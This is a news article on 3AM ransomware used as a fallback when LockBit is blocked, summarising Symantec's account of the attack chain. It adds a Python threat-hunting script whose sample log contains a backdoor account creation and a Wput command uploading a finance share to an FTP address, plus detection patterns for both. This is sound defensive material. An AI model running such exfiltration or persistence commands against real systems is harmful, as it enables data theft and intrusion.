
LockBit: attackers use alternative ransomware as a fallback

The emerging threat: 3AM ransomware deployed as a fallback when security controls block LockBit

Attackers are using 3AM ransomware as a substitute for LockBit when the latter is detected and blocked. The ransomware encrypts files and attempts to delete Volume Shadow copies, making recovery difficult. Symantec has published indicators of compromise that defenders can use to detect and block it.

According to threat researchers at Symantec, attackers are using the 3AM ransomware as a fallback option in case LockBit is detected and blocked. Even if a security product prevents the LockBit infection, the victim may still end up with encrypted files. 3AM, named for the .threeamtime extension it appends to encrypted files, is a new family written in Rust that attempts to terminate security and backup software on the infected computer. Although it has so far been observed in only one attack, this ransomware may well circulate again in the future.

3AM's modus operandi

According to the researchers' analysis, 3AM attempts to delete Volume Shadow copies after encrypting the target files and deleting the originals. It does not, however, appear effective or stealthy enough to go unnoticed: the attackers tried to deploy it on three machines in the corporate network, and it evaded the security controls on only one of them. Before encrypting the files, the attackers also exfiltrated data, leaving open the possibility of further extorting the victim organization.

Attack methods used by attackers

It was not specified how the first system was compromised. Symantec researchers did, however, observe a series of suspicious activities on it. These include running the "gpresult" command to dump the Group Policy settings applied to the computer for a specified user. The attackers also executed components of Cobalt Strike and attempted to escalate privileges using "PsExec". They then ran reconnaissance with commands such as "whoami", "netstat", "quser" and "net share", and enumerated other servers they could reach using "quser" and "net view". Finally, they added a new user account for persistence and uploaded the victim's files to their FTP server with the "Wput" tool.
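The command sequence above is noisy enough to hunt for in process-creation telemetry. The following script is an added example written for this page, not Symantec's code: it parses a constructed, pipe-delimited log of process creations (timestamp|host|user|command line) and flags any host that runs four or more of the reconnaissance commands within one hour, raising the severity when the same window also contains a "net user ... /add" or a Wput invocation. The log lines, the hostnames, the 203.0.113.7 FTP address and the thresholds are all assumptions chosen for illustration.

```python
"""Hunt for the 3AM pre-encryption chain in process-creation logs.

Added example, not part of the original article or of Symantec's tooling.
The log format (timestamp|host|user|command line), the sample events and the
thresholds below are constructed assumptions, not published detection rules.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events. SRV01 follows the chain described in the article;
# WS07 shows routine admin activity that must not trigger a finding.
SAMPLE_LOG = r"""
2023-09-05T03:02:10|SRV01|CORP\svc_backup|gpresult /z
2023-09-05T03:03:41|SRV01|CORP\svc_backup|whoami
2023-09-05T03:04:02|SRV01|CORP\svc_backup|netstat -ano
2023-09-05T03:04:30|SRV01|CORP\svc_backup|quser
2023-09-05T03:05:15|SRV01|CORP\svc_backup|net share
2023-09-05T03:06:00|SRV01|CORP\svc_backup|net view \\FS02
2023-09-05T03:09:48|SRV01|CORP\svc_backup|net user support1 P@ssw0rd! /add
2023-09-05T03:25:33|SRV01|CORP\svc_backup|wput.exe -u C:\share\finance ftp://203.0.113.7/
2023-09-05T09:14:02|WS07|CORP\jdoe|whoami
2023-09-05T11:40:19|WS07|CORP\helpdesk|net user jdoe /domain
2023-09-05T16:55:44|WS07|CORP\jdoe|netstat -an
"""

# Reconnaissance commands named in the Symantec write-up, keyed by a label.
RECON_PATTERNS = {
    "gpresult": re.compile(r"^gpresult\b", re.I),
    "whoami": re.compile(r"^whoami\b", re.I),
    "netstat": re.compile(r"^netstat\b", re.I),
    "quser": re.compile(r"^quser\b", re.I),
    "net share": re.compile(r"^net\s+share\b", re.I),
    "net view": re.compile(r"^net\s+view\b", re.I),
}
# Local account creation (persistence) and Wput-based FTP exfiltration.
PERSISTENCE = re.compile(r"^net\s+user\s+\S+\s+\S+\s+/add\b", re.I)
EXFIL = re.compile(r"(^|[\\/])wput(\.exe)?\b", re.I)


def parse_events(text):
    """Parse the constructed log format into (time, host, user, cmdline) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, user, cmd = line.split("|", 3)
        events.append((datetime.fromisoformat(ts), host, user, cmd.strip()))
    return events


def hunt(events, window=timedelta(hours=1), min_recon=4):
    """Return {host: finding} for each host whose activity inside a sliding
    window of length `window` contains at least `min_recon` distinct recon
    commands. Severity is raised to "high" when the same window also shows
    account creation or Wput usage, mirroring the later stages of the chain."""
    by_host = defaultdict(list)
    for ev in sorted(events):
        by_host[ev[1]].append(ev)

    findings = {}
    for host, evs in by_host.items():
        for i, (t0, _, _, _) in enumerate(evs):
            recon, new_account, exfil = set(), False, False
            for t, _, _, cmd in evs[i:]:
                if t - t0 > window:
                    break
                for label, pattern in RECON_PATTERNS.items():
                    if pattern.search(cmd):
                        recon.add(label)
                if PERSISTENCE.search(cmd):
                    new_account = True
                if EXFIL.search(cmd):
                    exfil = True
            if len(recon) >= min_recon:
                findings[host] = {
                    "start": t0.isoformat(),
                    "recon": sorted(recon),
                    "new_account": new_account,
                    "exfil": exfil,
                    "severity": "high" if (new_account or exfil) else "medium",
                }
                break  # one finding per host is enough for triage
    return findings


if __name__ == "__main__":
    for host, finding in hunt(parse_events(SAMPLE_LOG)).items():
        print(host, finding)
```

The sliding window matters more than the individual patterns: each of these commands is legitimate on its own, and it is the cluster of six reconnaissance commands from one host, followed by account creation and an FTP upload, that distinguishes this activity from an administrator's day. Tune `window` and `min_recon` against your own baseline before deploying.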

Indicators of compromise provided by Symantec

Symantec published indicators of compromise, including IP addresses and file hashes for both ransomware payloads (3AM and LockBit) and for the Cobalt Strike components. Defenders should load these indicators into their detection tooling so that potential attacks can be identified and mitigated early.


09/14/2023 11:09

Marco Verro
